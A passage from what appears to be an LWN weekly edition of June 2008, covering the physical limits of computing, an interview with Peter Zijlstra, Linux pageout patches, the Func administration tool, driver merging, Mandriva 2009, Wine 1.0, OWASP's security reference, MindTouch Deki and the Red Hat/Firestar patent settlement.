requires a distinct physical state.  According to Lloyd, we have
"known for more than a century that the number of accessible states of
a physical system, W, is related to its thermodynamic entropy
by the formula: S = kB ln W" (S is the thermodynamic
entropy of the system).  This means we can calculate the number of bits
the ultimate laptop can store if we know what its total entropy is.


Calculating the exact entropy of a system turns out to be hard.  From
the paper:


To calculate exactly the maximum entropy for a kilogram of matter in a
liter volume would require complete knowledge of the dynamics of
elementary particles, quantum gravity, etc. We do not possess such
knowledge. However, the maximum entropy can readily be estimated by a
method reminiscent of that used to calculate thermodynamic quantities
in the early universe.  The idea is simple: model the volume occupied
by the computer as a collection of modes of elementary particles with
total average energy E.


The following discussion is pretty heavy going; for example, it
includes a note that baryon number may not be conserved in the case of
black hole computing, something I'll have to take Lloyd's word on.  But
the end result is that the ultimate laptop, operating at maximum
entropy, could store at least 2.13 x 1031 bits.  Of course,
maximum entropy means that all of the laptop's matter is converted to
energy - basically, the equivalent of a thermonuclear explosion.  As
Lloyd notes, "Clearly, packaging issues alone make it unlikely that
this limit can be obtained."  Perhaps a follow-on paper can discuss
the Ultimate Laptop Bag...


How close are modern computers to this limit?  A modern laptop in 2008
can store up to 250GB - about 2 x 1012 bits.  We're about
19 orders of magnitude away from maximum storage capacity, or about 64
more doublings in capacity.  Disk capacity as measured in bits per
square inch has
doubled about
30 times between 1956 and 2005, and at this historical rate, 64
more doublings will only take about 50 - 100 years.  This
isn't the overall limit on Moore's law as applied to computing, but it
suggests the possibility of an end to Moore's law as applied to
storage within some of our lifetimes.  I guess we file system
developers should think about second careers...

Redundancy and error correction

Existing computers don't approach the physical limits of computing for
many good reasons.  As Lloyd wryly observes, "Most of the energy [of
existing computers] is locked up in the mass of the particles of which
the computer is constructed, leaving only an infinitesimal fraction
for performing logic."  Storage of a single bit in DRAM uses "billions
and billions of degrees of freedom" - electrons, for example - instead of
just one degree of freedom.  Existing computers tend to conduct
computation at temperatures at which matter remains in the form of
atoms instead of plasma.


Another fascinating practical limit on computation is the error rate
of operations, which is bounded by the rate at which the computer can
shed heat to the environment.  As it turns out, logical operations
don't inherently require the dissipation of energy, as von Neumann
originally theorized.  Reversible operations (such as NOT) which do
not destroy information do not inherently require the dissipation of
energy, only irreversible operations (such as AND).  This makes some
sense intuitively; the only way to destroy (erase) a bit is to turn
that information into heat, otherwise the bit has just been moved
somewhere else and the information it represents is still there.
Reversible computation has been implemented and shown to have
extremely low power dissipation.


Of course, some energy will always be dissipated, whether or not the
computation is reversible.  However, the erasure of bits - in
particular, errors - requires a minimum expenditure of energy.  The
rate at which the system can "reject errors to the environment" in the
form of heat limits the rate of bit errors in the system; or,
conversely, the rate of bit errors combined with the rate of heat
transfer out of the system limits the rate of bit operations.  Lloyd
estimates the rate at which the system can reject error bits to the
environment, relative to the surface area and assuming black-body
radiation, as 7.195 x 1042 bits per meter2 per
second.

Computational limits of "smart dust"

Right around the same time that I read the "Ultimate Limits" paper, I
also read
A
Deepness in the Sky by Vernor Vinge, one of many science fiction
books featuring some form of "smart dust."  Smart dust is the concept
of tiny computing elements scattered around the environment which
operate as a sort of low-powered distributed computer.  The smart dust
in Vinge's book had enough storage for an entire systems manual, which
initially struck me as a ludicrously large amount of storage for
something the size of a grain of dust.  So I sat down and calculated the
limits of storage and computation for a computer one μm3
in size, under the constraint that its matter remain in the form of
atoms (rather than plasma).


Lloyd calculates that, under these conditions, the ultimate laptop
(one kilogram in one liter) can store about 1025 bits and
conduct 1040 single-bit operations per second.  The
ultimate laptop is one liter and there are 1015
μm3 in a liter.  Dividing the total storage and
operations per second by 1015 gives us 1010 bits
and 1025 operations per second - about 1 gigabyte in data
storage and so many FLOPS that the prefixes are meaningless.
Basically, the computing potential of a piece of dust far exceeds the
biggest supercomputer on the planet - sci-fi authors, go wild!  Of
course, none of these calculations take into account power delivery or
I/O bandwidth, which may well turn out to be far more important limits
on computation.

Implications of the ultimate laptop

Calculating the limits of the ultimate laptop has been a lot of fun,
but what does it mean for computer science today?  We know enough now
to derive a theoretical upper bound for how long a generalized Moore's
Law can remain in effect.  Current laptops store 1012 bits
and conduct 1012 single-bit operations per second.  The
ultimate laptop can store 1031 bits and conduct
1051 single-bit operations per second, a gap of a factor of
1019 and 1039 respectively.  Lloyd estimates the
rate of Moore's Law as 108 factor of improvement in areal
bit density over the past 50 years.  Assuming that both storage
density and computational speed will improve by a factor of
108 per 50 years, the limit will be reached in about 125
years for storage and about 250 years for operations per second.  One
imagines the final 125 years being spent frantically developing better
compression algorithms - or advanced theoretical physics research.


Once Moore's Law comes to a halt, the only way to increase computing
power will be to increase the mass and volume of the computer, which
will also encounter fundamental limits.  An unpublished paper entitled
Universal Limits on
Computation estimates that the entire computing capacity of the
universe would be exhausted after only 600 years under Moore's Law.


250 years is a fascinating in-between length of time.  It's too far
away to be relevant to anyone alive today, but it's close enough that
we can't entirely ignore it.  Typical planning horizons for long-term
human endeavors (like managing ecosystems) tend to max out around 300
years, so perhaps it's not unthinkable to begin planning for the end
of Moore's Law.  Me, I'm going to start work on the LZVH compression
algorithm, tomorrow.


One thing is clear: we live in the Golden Age of computing.  Let's
make the most of it.


Valerie Henson is a Linux consultant
    specializing in file systems and owns a one kilo, one liter laptop.


		Peter Zijlstra: From DOS to kernel hacking


In a linux-kernel thread about fixing the Kernel Janitors project, Peter
Zijlstra spoke up, with a bit of his
perspective on attracting better kernel contributors.  As he is a
relatively recent addition to the kernel community, his path from Linux
user to kernel hacker may serve as a template of sorts for others who are
starting out now.  We asked Peter to answer a few questions by email to
help fill in some more of the details.


LWN: How did you get started with Linux?  What attracted you?


Peter: Around the time Win95 came around, IIRC [if I remember
correctly]. I used to do demo 
coding on
DOS, which involved rebooting your machine every time you messed up, and
whereas DOS reboots quite quickly, doing the same on Win95 was anything
but quick.

A friend of mine introduced me to Unix/Linux at the time, and I started
learning all about programming in a real environment. Basically all
programming up to that point was in a freestanding environment where you
had to poke the hardware to get anything done.

So initially it was the charm of a proper multitasking OS (with memory
protection) that got me to use it – not having to reboot your machine
every time, and the luxury of being able to run a debugger.


LWN: How quickly did you start poking around in the kernel?  What
did you first start to look at and why?  


Peter: The kernel ... well that took a seriously long while. The
above introduction to Linux was around 95/96 IIRC. My first real kernel
patches were about 10 years later.

In those 10 years I learnt a lot about programming. I learnt about Unix
system programming, I learnt about C++, multi-threading, database
engines, and a whole range of interesting things.

Somewhere along I got a real internet connection and started lurking on
mailing lists, including LKML – I must have been reading that on and off
for about 5 years by the time I really sat down and wrote some patches.

During that time I might have sent in some trivial build fixes, and I
remember finding a priority leak in one of the realtime patches. But I
wasn't actively coding on the kernel – I just liked running real exotic
stuff, you know Gentoo and building just about everything from CVS.

So what got me started on the kernel ... I can't quite remember how it
happened, but I ran into some of Rik's [van Riel] Advanced Page Replacement
stuff. 
I had worked on that problem space earlier while doing database engines,
and had recently run into it again at work. So I started reading those
papers and some of the proposed kernel patches, and I started to itch.

I dropped basically everything I was working on in my spare time
(hacking WindowMaker, writing a C++ ASN.1-DER serialization class,
writing a new LDAP server and I'm sure some other projects that are
rotting away on a harddrive somewhere  :-)  and started hacking.

Why ... I'm not sure – it sure got me back to where I started out –
crashing machines (and boot times haven't improved over those past 10
years at all).

I think because of the challenge – I knew I could write whatever it was
I was coding and this page replacement stuff was a whole new challenge,
and TBH [to be honest] the kernel code didn't look too hard at the time
(phew how 
ignorant I was..)


LWN: How well were your contributions received by kernel hackers?
Did you make any missteps along the way? 


Peter: Some better than others. I think its natural for every kernel
hacker to
grow a huge pile of discarded patches. Not everything will make it. But
don't get discouraged by that, you did get to learn something from doing
them.

Mis-steps, feh, still do  ;-)  Unlike most people seem to think, kernel
hackers are human too.


LWN: What suggestions do you have for folks that are looking at
getting involved in kernel hacking today? 


Peter: Just do it – seriously it's that easy. Oh and don't be
afraid 
of
criticism, you'll get it anyway – in spades. Criticism is not personal,
it's about your patch, there are two things you can do:


take it and act upon it
convince the other he's wrong


OK it can get personal, but that is only if you repeatedly fail the
above two points.


LWN: There has been a lot of talk about the Kernel Janitors project
recently, do you think that is a good way to get started with kernel
development?  What do you think should be done differently in that (or
other) project(s) to attract more and better contributors? 


Peter: I'm not sure. The Kernel Janitors thing doesn't really seem to
work out.
I think that might be due to two things:


we don't have enough simple but interesting things lined up (not
saying there are none, but we don't have a ready list). I think a proper
challenging project would be much better that moronic code clean ups.
the kernel really isn't a place for newbies; now let me explain this
before it gets all mis-interpreted  :-)

Things really get a lot easier if you're fairly competent at (Unix)
system programming before starting at the kernel.
Kernel hacking is a solitary business in that you need to do
things, nobody is going to do them for you. That is not saying nobody
can help you if you have a question. Also, nobody is going to force you
to do something – you need to want doing it.


Now, none of this means you can't start hacking the kernel without
knowing C or any programming it all, but you'd better be ready for one
hell of a ride (Yes, there are people who learnt C from doing kernel
stuff, but that is going to take a serious amount of will-power to pull
off).

So I guess what I'm saying is that you need to really want to do it.
There is no other way to become a kernel hacker than by simply doing it.


LWN: Do you work on Linux for your job, as a hobby, or both?


Peter: Both; initially it was spare time besides $JOB. But after
keeping this
up for about a year my wife nudged me to look for a kernel job, since I
obviously enjoyed hacking the kernel more than $JOB, and she'd get some
of that spare time back  ;-) 

So I applied for a kernel position at a few of the larger vendors, and
Red Hat won the race.

Already having had a year's worth of exposure to kernel code and LKML,
certainly helped in getting this amazing opportunity. Have I already
mentioned I absolutely love working on the kernel?

So now I get to poke at the kernel all day, every day... 


LWN: What are your current kernel projects?  What kinds of things do
you see yourself doing in the kernel in the future? 


Peter: Current active projects are group scheduling and some -rt
work. I should
pick up the swap over network code again, and there are some other loose
ends.

The future ... well we'll see what happens, loads of interesting stuff to
do.


We would like to thank Peter for taking the time to answer our questions.

		The state of the pageout scalability patches


The virtual memory scalability improvement patch set overseen by Rik van
Riel has been under construction for well over a year; LWN last looked at it in November,
2007.  Since then, a number of new features have been added and the patch
set, as a whole, has gotten closer to the point where it can be considered
for mainline inclusion.  So another look would appear to be in order.


One of the core changes in this patch set remains the same: it still
separates the least-recently-used (LRU) lists for pages backed up by files
and those backed up by swap.  When memory gets tight, it is generally
preferable to evict page cache pages (those backed up by files) rather than
anonymous memory.  File-backed pages are less likely to need to be written
back to disk and they are more likely to be well laid-out on disk, making
it quicker to read them back in if necessary.  Current Linux kernels keep
both types of pages on the same LRU list, though, forcing the pageout code
to scan over (potentially large numbers of) pages which it is not
interested in evicting.  Rik's patch improves this situation by splitting
the LRU list in two, allowing the pageout code to only look at pages which
might actually be candidates for eviction.


There comes a point, though, where anonymous pages need to be reclaimed as
well.  The kernel will make an effort to pick the best pages to evict by
going for those which have not been recently referenced.  Doing that,
however, requires going through the entire list of anonymous pages,
clearing the "referenced" bit on each.  A large system can have many
millions of anonymous pages; iterating over the entire set can take a long
time.  And, as it turns out, it's not really necessary.


The VM scalability patch set now changes that behavior by simply keeping a
certain percentage of the system's anonymous pages on the inactive list -
the first place the system looks for pages to evict.  Those pages will
drift toward the front of the list over time, but will be returned to the
active list if they are used.  Essentially, this patch is applying a form
of the "referenced" test to a portion of anonymous memory - whether or not
anonymous pages are being evicted at the time - rather than trying to check
the referenced state of all anonymous pages when the kernel decides it
needs to reclaim some of them.


Another set of patches addresses a different situation: pages which cannot
be evicted at all.  These pages might have been locked into memory with a
system call like mlock(), be part of a locked SYSV shared memory
region, or be part of a RAM disk, for example.  They can be either page
cache or anonymous pages.  Either way, there is little point in having the
reclaim code scan them, since it will not be possible to evict them.  But,
of course, the current reclaim code does have to scan over these pages.


This unneeded scanning, as it turns out, can be a problem.  The extensive
unevictable LRU document included with the
patch claims:


	For example, a non-numal x86_64 platform with 128GB of main memory
	will have over 32 million 4k pages in a single zone.  When a large
	fraction of these pages are not evictable for any reason [see
	below], vmscan will spend a lot of time scanning the LRU lists
	looking for the small fraction of pages that are evictable.  This
	can result in a situation where all cpus are spending 100% of their
	time in vmscan for hours or days on end, with the system completely
	unresponsive.


Most of us are not currently working with systems of this size; one must
spend a fair amount of money to gain the benefits of this sort
of pathological behavior.  Still, it seems like something which is worth
fixing. 

The solution, of course, is yet another list.  When a page is determined to
be unevictable, that page will go onto the special, per-zone unevictable
list, after which the pageout code will simply not see it anymore.  As a
result of the variety of ways in which a page can become unevictable, the
kernel will not always know at mapping time whether a specific page can go
onto the unevictable list or not.  So the pageout code must keep an eye out
for those pages as it scans for reclaim candidates and shunt them over to
the unevictable list as they are found.  In relatively short order, the
locked-down pages will accumulate in this list, freeing the pageout code to
concentrate on pages it can actually do something about.


Many of the concerns which have been raised about this patch set over the
last year have been addressed.  A few remain, though.  Some of the new
features require new page flags; these flags are in extremely short supply,
so there is always pressure to find ways of implementing things which do
not allocate more of them.  There are a few too many configuration options
and associated #ifdef blocks.  And so on.  Addressing these may
take a while, but convincing everybody that these (rather fundamental) memory
management changes are beneficial under all circumstances may take rather
longer.  So, while this patch set is making progress, a 2.6.27 merge is
probably not in the cards.

		Multi-system administration with Func


Managing multiple computer systems can involve a lot of repetitive tasks:
connecting to each, performing some update, status check, or configuration
tweak, and then 
moving on to the next machine.  These kinds of things can be scripted of
course, but scripts of that nature typically need to be adjusted frequently
as 
machines come and go or the tasks change.  The Fedora Unified Network Controller
(Func) is a tool that will help simplify system administration, but there
is more to it than that—it is a framework for doing two-way secure
communication, from the command line, scripts, or applications.


Func is written in Python, providing an API for scripts written in that
language, but it can also be used from the command line.  Each client
machine—minion in Func-speak—runs the funcd
daemon which contacts the master server or overlord.  From the
overlord machine, commands can then be issued to individual minions or to
subsets of them.  Some of the power of Func can be seen in simple commands
like: 

which will restart the web server on all of the minions.


Similar kinds of tasks—but with more control—can be handled
through the Python API.  A somewhat contrived example from the Func website
gives a sense of what can be done:

This example looks for minions that are running a web server and reboots
each that it finds.


Managing keys can be a hassle when using ssh as an
administrative tool, so Func uses another tool, Certmaster, to assist with
keys.  Certmaster provides a set of utilities and a Python API for managing
SSL certificates.  Clients generate certificate signing requests (CSRs),
which contain their public key,
that are sent to the Certmaster on the overlord.  Administrators can either
sign them from the command line or enable auto-signing.  The minion then
retrieves the signed certificate so that the overlord and minion
communicate over an encrypted channel after that.   


Func is not meant to replace ssh, instead it is intended to
provide multi-system and scripting capabilities which are not the strengths of
ssh.  Like ssh, though, Func is meant to be easy to
deploy—eventually ubiquitous, at least for Fedora—simple to use
as well as easy to extend.  It also has a pluggable architecture that allows
Python modules to be integrated easily into Func, expanding the abilities
of the minions.  The documentation
shows how to use the func-create-module command to generate
template code which allows the administrator to ignore the Func
requirements and concentrate on the task at hand.


There is nothing particularly Fedora-specific about Func, that's just where
it was born.  There are some efforts underway to add it for other
distributions.  Most of the work would be in creating distribution-specific
analogs for things like restarting services and querying hardware
configurations. 


Red Hat has been releasing a steady stream of system administration tools
over the last year or so.  The Emerging Technology (ET) group
has developed quite an ecosystem of tools to support installations with
large numbers of servers that are frequently installed and upgraded.  One
might think they have a large infrastructure of such servers.


One of those tools that is frequently discussed in conjunction with Func is Cobbler.  It is meant to simplify
the configuration of a server to handle network installation and booting
for a large server farm.  From the web page:

In short, Cobbler helps build and maintain network installation
infrastructure really easily. It's highly customizable to your particular
methods of operation through a wide variety of options, a powerful command
line, a Web interface, a pluggable extension mechanism, and (for
developers) its own Python API. Cobbler lets administrators forget how
software gets installed and delivered and lets them concentrate instead on
what they want to install where.


Cobbler and the other tools coming out of the ET group are not just
targeted at physical machines, but also virtualized environments.  By using
Cobbler, the puppet configuration
manager, and the oVirt virtual machine
manager, thousands of systems of various kinds can be managed in a
centralized fashion.  As would be expected, all of the code is available
as free software. 


These tools are quite interesting for system administrators, particularly
those who use Fedora and have lots of systems to maintain.  Even for small
home networks, though, Func at least could come in handy.  For overworked
administrators—no matter the size of their domain—better tools
are always welcome.


		Why some drivers are not merged early


Arjan van de Ven's kernel oops report always makes for interesting reading;
it is a quick summary of what is making the most kernels crash over the
past week.  It thus points to where some of the most urgent bugs are to be
found.  Sometimes, though, this report can raise larger issues as well.
Consider the June 16
report, which notes that quite a few kernel crashes were the result of
a not-quite-ready wireless update shipped by Fedora.  Ingo Molnar was quick
to jump on this report with a
process-related complaint:


	i suspect Fedora has done this to enable more hardware, and/or to
	fix mainline wireless bugs?  I wish we would do such new driver
	merging in mainline instead, so that we had a single point of
	testing and single point of effort.

	Same for Nouveau: Fedora carries it and i dont understand why such
	a major piece of work is not done in mainline and not _helped by_
	mainline.


He then took the discussion further with
this observation:


	That's my main point: when we mess up and dont merge OSS driver
	code that was out there in time - and we messed up big time with
	wireless - we should admit the screwup and swallow the bitter pill.


This comment drew some unhappy responses from the networking developers,
who feel that they have been unfairly targeted for criticism.  Wireless
drivers have been merged at the first real opportunity, they say, and
trying to put them in earlier would have only made things worse.  In fact,
your editor will submit that mistakes were made with wireless
drivers, but those mistakes have little to do with delaying their inclusion
into the mainline.  What went wrong with wireless is this:


 Early wireless developers did not really try to solve the wireless 
     networking problem; they just wanted to get their adaptor to work.
     Wireless maintainer John Linville once told your editor that, for
     years, these adaptors were treated as if they were Ethernet adaptors,
     which they certainly are not.  When these developers did get around to
     dealing with issues specific to wireless networking, they created
     their own wireless stacks contained within their drivers.  So no
     general wireless framework was created.

     It's only in 2004 that Jeff Garzik started a project to create
     a generic wireless stack for Linux - and he started with a
     stack (HostAP) which, sometime later on, was seen as not being the
     best choice.  So the work on HostAP - late to begin in the first place
     - was eventually abandoned.

 The networking stack which was eventually developed - mac80211 - began
     its life as a proprietary code base created with no community review
     or oversight at all.  Predictably, it had all kinds of problems which
     required well over a year of work to resolve.  Until mac80211 was in
     reasonable shape, there was no real way to get drivers ready for
     inclusion.


The result of all this (and the occasional legal hassle as well) is that
wireless networking on Linux lagged for 
years, and is only now reaching something close to a stable state.  So it
is not surprising that there has been a lot of code churn in this area, or
that things occasionally break.  But it is hard to see how trying to merge
wireless drivers sooner would have helped the situation significantly.


The non-merging of the Nouveau driver - the reverse-engineered driver for
NVIDIA adapters - also has a simple explanation: the developers have not
yet asked for this merge to happen.  Nouveau is not considered to be at a
point where it works yet, and, importantly, there are still user-space API
issues which must be worked out.  Breaking user-space code is severely
frowned upon, so merging of code is nearly impossible if its user-space
interfaces are still in flux.


James Bottomley put
forward another reason why a driver may stay out of the mainline even
though the author would like to see it merged:


	For the record, my own view is that when a new driver does appear
	we have a limited time to get the author to make any necessary
	changes, so I try to get it reviewed and most of the major issues
	elucidated as soon as possible.  However, since the only leverage I
	have is inclusion, I tend to hold it out of tree until the problems
	are sorted out.


In other words, their control over access to the mainline tree is the one
club subsystem maintainers have at hand when they feel the need to push a
developer to make changes to a driver.  It may well be that simply merging
drivers regardless of technical objections (something which a number of
developers are pushing for) will reduce the incentive for developers to get
their code into top shape - and it's not always clear that others will step
in and do the work for them.

On the other hand, the idea that in-tree code tends to be less buggy than
out-of-tree code is relatively uncontroversial.  So, for many drivers at
least, a "merge first and fix it up later" policy may well lead to the best
results in the shortest period of time.  One thing that is clear is that
this discussion will not be going away anytime soon; chances are good that
this year's kernel summit (happening in September) will end up revisiting
the issue.

		Looking ahead to Mandriva 2009


Mandriva developer Adam Williamson recently
announced the plans for Mandriva Linux 2009.  The schedule and other
details are available at 2009 development
wiki.

There will be two alpha releases, two beta releases and two release
candidates before the final release in October 2008.  The first alpha will
be available very soon as the scheduled date is June 25, 2008.  As usual
Mandriva 2009 will be available in the Free, One (live CD) and PowerPack
editions.

So what's in store?   Users of Cooker, Mandriva's development branch, will
have already noticed the churn as gcc is upgraded to 4.3.  There's also the
switch to newer technologies such as libata and PolicyKit.  The final
kernel is not yet fixed but will likely be 2.6.26; with server, desktop and
desktop586 flavors.

The technical specifications available in SVN, where they are changed to
reflect progress.  I looked at the PDF
snapshot for more information.

KDE 4.1 and GNOME 2.24 will both be available, along with updated packages
such as OpenOffice.org 3 and Firefox 3.  There's a new design for the
installer, and live distribution upgrade mode for MandrivaUpdate.  The
package management tools will be smarter about the removal of packages that
are no longer required.  The Windows migration tools have also gotten
smarter, making it easier than ever for new users to get started with
Linux.

That's just the beginning.  There is much more coming up in Mandriva Linux
2009.

		The Wine project releases version 1


Wine (Wine Is Not an Emulator)
is one of the long-standing Windows interoperability projects that
runs under Linux and other Unix-based systems:


Wine is an Open Source implementation of the Windows API on top of X, OpenGL, and Unix.
Think of Wine as a compatibility layer for running Windows programs. Wine does not require Microsoft Windows, as it is a completely free alternative implementation of the Windows API consisting of 100% non-Microsoft code, however Wine can optionally use native Windows DLLs if they are available. Wine provides both a development toolkit for porting Windows source code to Unix as well as a program loader, allowing many unmodified Windows programs to run on x86-based Unixes, including Linux, FreeBSD, Mac OS X, and Solaris. Wine is free software, released under the GNU LGPL.


Although not game-specific, the ability to run Windows games has
always been one of the major driving forces behind Wine.
The Wine AppDB page
lists the numerous Windows applications that have been made to
work under Wine.  Photoshop CS2 stands out as one of the few most-popular
Wine-compatible Windows applications that is not a game.


The
Wine Features
document lists Wine's capabilities, it is capable of running
DOS through Windows XP applications, Windows Vista
compatibility is not yet mentioned.
The About Wine
document explores the project's
history,
contributors,
myths
and more.
The history document details the magnitude of the project:
"Wine has grown to over 1.4 million lines of C code over the past decade. Nearly 700 people have contributed in some fashion. As always, you can expect Wine to be released sometime this year; or maybe early next year."


Version 1.0 of Wine was
announced
(see the 
LWN reader comments)
on June 17, 2008:


The Wine team is proud to announce that Wine 1.0 is now available.
This is the first stable release of Wine after 15 years of development
and beta testing. Many thanks to everybody who helped us along that
long road!


There have been a series of Wine 1.0 release candidates over the
last month involving a ton of bug fixes, janitorial code work,
translation improvements and more.  The details are available in
the series of release notes for
RC1,
RC2,
RC3,
RC4,
RC5
and finally

version 1.0.


Binary packages and source code for Wine 1.0 are
available
for download.  While fairly unusual for most open-source projects,
a commercial distribution of Wine known as CrossOver is available from
Code Weavers.
CrossOver Linux 7.0, which is synchronized with Wine 1.0, was
announced this week.


		The Application Security Desk Reference


The Open Web Application
Security Project (OWASP) has undertaken an ambitious project to create
a reference manual—in the same vein as the Physician's Desk
Reference—covering application security.  The book, along with a
companion wiki are
meant to be the starting point for researchers, developers, and code
reviewers when performing a number of security-related tasks.  The book is
currently in an alpha state, with OWASP looking for more reviewers and
authors to get 
the book into a finished state by August.


The Application
Security Desk Reference (ASDR) will be a 900+ page book,
extensively tagged—cross-referenced in the wiki—to provide a multi-dimensional view of security
threats, attacks, vulnerabilities, and impacts.  The book introduces a set
of principles that will help guide developers in avoiding these problems
along with controls (aka countermeasures) to evade or eliminate them.  The
authors provide a
description of why they took this approach:

Application security information cannot be organized into a one-dimensional
taxonomy that is useful for all
purposes, although many have tried. For example, organizing application
security by vulnerability helps tool
vendors, but makes it very difficult for architects to select
controls. We've adopted the folksonomy tagging
approach to solving this problem. We simply tag our articles with a number
of different categories. You can use
these categories to help get different views into the complex,
interconnected set of topics that is application
security.


The PDF 0.9 version is available, and it is already
quite useful, though there is still a fair amount of work to do.  An
important goal is to provide a foundation: 

The ASDR is helpful as basic reference material when performing such
activities as threat modeling, security
architecture review, security testing, code review, and metrics. We intend
to encourage understanding and
consistency when discussing these basic foundational elements of
application security. Security only works if
people can make informed decisions about risk. The ASDR provides that basic
information to help ensure all
stakeholders are involved.


Technical books have a unfortunate tendency to rapidly go stale because the
industry moves so quickly.  Maintaining the wiki will help alleviate this
problem by allowing for a dynamic
reference that can be periodically produced in dead tree form as well.
Much of this kind of information can be found in books and on the web, but
collecting it up into one place is very valuable.


Three sections of the current draft stand out as being closest to
completion: Principles, Attacks, and Vulnerabilities.  Principles contains
17 basic things to keep in mind as part of gaining a "security
consciousness".  It defines terms in clear language and provides reasons why
the principle should be followed.  An example:

Security through obscurity is a weak security control, and nearly always
fails when it is the only control. This is not
to say that keeping secrets is a bad idea, it simply means that the
security of key systems should not be reliant
upon keeping details hidden.


More than 50 attacks are listed, along with examples and concise
descriptions.  In addition, there are several hundred vulnerabilities
listed, each with examples as well as information on which platforms or
languages are affected.  It clearly sets out to be a clearinghouse of
application security information and looks like it is succeeding in that.


For anyone with an interest in security, it is well worth a look. For those
who are skilled in security techniques, assisting with the review and
content creation might be in order.  


		Deki helps Mozilla developers collaborate


There was undoubtedly plenty of activity this week at the Mozilla Developer
Center ahead of the release of Firefox 3. Thanks to a special tool
created by the team at MindTouch
and implemented into its latest product offering, Deki, Mozilla developers all
across the globe were able view the site in their native tongue.  

The "polyglot" language feature is only one of several components that
make up Deki, an open source collaboration tool for communities
and the enterprise. The polyglot can distinguish between different
languages across a single system so it's no longer necessary for IT
professionals to allocate sections of a web site's infrastructure to
overcome language barriers. Instead, multiple languages are consolidated
into one system and a site's pages are then localized according to user
settings. 

Deki functions similar to that of a traditional wiki, but with
more features and practical applications. In fact, the company originally
called the product "Deki Wiki" but realized it was too limiting and
recently dropped "Wiki" from the name altogether. Developers can use Deki
as a way to organize and aggregate project data, share documents and media,
or even author and create collaborative applications from the ground
up. Groups and organizations also use Deki as platform for managing a
large knowledge base, coordinating team-based projects, or as a file
repository.  

Deki is part application, part platform. It behaves much the same way as
other content management frameworks like Drupal and Joomla!, but has the
underpinnings of 
a wiki that give it collaborative features as well. Furthermore, everything
under Deki's hood can be accessed via the API on which it was built, and
can be extended in any programming language. 

At the heart of the platform is MindTouch Dream, which forms the
application's architecture, and uses Deki as its interface. It's a .NET
representational
state transfer (REST) framework that runs on .NET 2.0 and
Mono 1.2 — .NET 
runs on Microsoft Windows Servers 2003 and 2008, while Mono runs on Debian,
Fedora, Ubuntu, openSUSE, and Apple OS X (see the web
site for complete details). Data manipulation is done in XML using
standard HTTP verbs, and data conversions to PHP, JSONP, etc. are done
automatically behind the scenes. Licensed under the Gnu GPL and LGPL,
together Deki and Dream can be completely customized and scaled to the
needs of any size organization. 

Company co-founders Aaron Fulkerson and Steve Bjorg were approached last
winter by Mozilla's Chief Evangelist Mike Shaver about implementing Deki in
time for the upcoming re-launch of its Developer Center. "Mike had reviewed
our API and architectural documentation and he was enthusiastic about
MindTouch Deki," recalls Fulkerson. "Later on the phone, we discussed
Mozilla's needs, pains, and how MindTouch Deki seemed to be the perfect
solution. We also day-dreamed a little about what the Mozilla community
might build on the MindTouch platform. By my recollection, we both were
pretty excited about the opportunity." 

Given the Developer Center's wide geographical reach, barriers were to
be expected as it struggled to cater to a group that collectively spoke
dozens of different languages. In response, Bjorg and Fulkerson put
together a design that allows for a multi-lingual Web site that scales as
needed. As Mozilla's needs grow, additional languages can easily be added
by translating a single file and submitting it for inclusion
in the official Deki build. In fact, all current translations have come
from the community, and more are on the way. 

Deki isn't just for large organizations. Development
platform-as-a-service provider Bungee
Connect uses it as a documentation repository at the moment, but
according to the Director of Bungee Connect's Developer Community, Ted
Haeger, the plan is to soon make it the community platform for its
Developer Network. "Our developers are very interested in programmable Web
technologies, and Deki will allow us to provide them the most
feature-complete wiki API we have seen yet. We expect to see some
interesting and exciting things built by combining Bungee Connect and
MindTouch Deki," he says. 

The decision to choose Deki over other similar options "was driven
overwhelmingly by the architecture of the product. Because Deki provides a
complete RESTful API,
it makes it an extremely attractive offering for us," notes Haeger. 

Indeed, he considers the API Deki's best feature. "MindTouch has done an
outstanding job with it," Haeger says. "Additionally, they have written
their PHP front-end to the Deki API, which means that the API is central to
the product rather than an afterthought. However, we should note that
Deki's default PHP user interface is extremely polished, too. That combined
with other must-haves, such as a permissions system that is considerably
more flexible than what other wikis provide, helped solidify our decision." 

Though there are varying levels of support options available, Haeger
says Bungee Connect hasn't yet decided which to choose. They do plan,
however, to lean on MindTouch for assistance as they migrate company
documentation from MediaWiki to Deki. For organizations planning to take on the
task 
themselves, Fulkerson points to the helpful
guide on its site and the Mediawiki to Deki converter they have
written: "As we always have done, we've 
released the source code to our public SVN repository. It's stable and has
had generous test coverage, but this should be considered a beta release." 

As Deki continues to gain traction in the enterprise as an agile content
management system, Fulkerson and Bjorg say they knew they were on to
something when they caught wind of the first user-organized conference held
in Belgium last fall. Notes Fulkerson, "This was a pretty clear indication
people liked what we're doing."

		A belated look at the Red Hat/Firestar patent settlement


On June 11, Red Hat announced
that it had reached a settlement in the software patent lawsuit it was
defending against Firestar Software, Inc. and DataTern, Inc.  This
settlement is of interest to the community; it may point toward how how
such cases may go in the future.  Unfortunately, the amount of information
which has been released so far leaves as many questions as answers,
including the fundamental question of whether this settlement is as good
for the community as Red Hat is claiming.


The suit involves patent
#6,101,502, which claims the concept of creating an impedance-matching
layer to connect relational databases to object-oriented applications.  The
first claim reads like this:


	1. A method for interfacing an object oriented software application
	with a relational database, comprising the steps of:

selecting an object model;
generating a map of at least some relationships between schema in the
	database and the selected object model; 
employing the map to create at least one interface object associated
	with an object corresponding to a class associated with the object
	oriented software application; and 
utilizing a runtime engine which invokes said at least one interface
	object with the object oriented application to access data from the
	relational database.


One might well wonder how object-oriented programmers managed before 1998,
when this patent was filed.  Firestar claimed that a piece of JBoss
violated the patent and duly filed suit; Red Hat has been fighting back
ever since.  The June 11 announcement appears to bring an end to this
particular dispute.

While Red Hat has not agreed that it was in violation of this patent, the
company did not reach a settlement which clears it of infringement.
Instead, Red Hat agreed to license the patent for itself and for its
customers.  The thing that
makes this settlement a little more interesting is that Red Hat did not
stop there; it also obtained a license for the project's upstream
developers.  From the
settlement FAQ posted by the company:


	Upstream developers receive a perpetual, fully paid-up,
	royalty-free, irrevocable worldwide license to the patents in suit
	to engage in any and all activities with respect to a predecessor
	version of a Red Hat product. Those developers also receive a
	perpetual covenant not to sue with regard to all of DataTern's and
	Amphion's other patents on claims related to Red Hat products.


The press release adds:


	The settlement also protects derivative works of, or combination
	products using, the covered products from any patent claim based in
	any respect on the covered products. Essentially, all that have
	innovated to create, or that will innovate with, software
	distributed under Red Hat brands are protected, as are Red Hat
	customers.


So, in other words, this license and covenant covers the "predecessor
versions" of any package shipped by Red Hat.  Once a particular project
finds its way into RHEL, it's part of the deal.

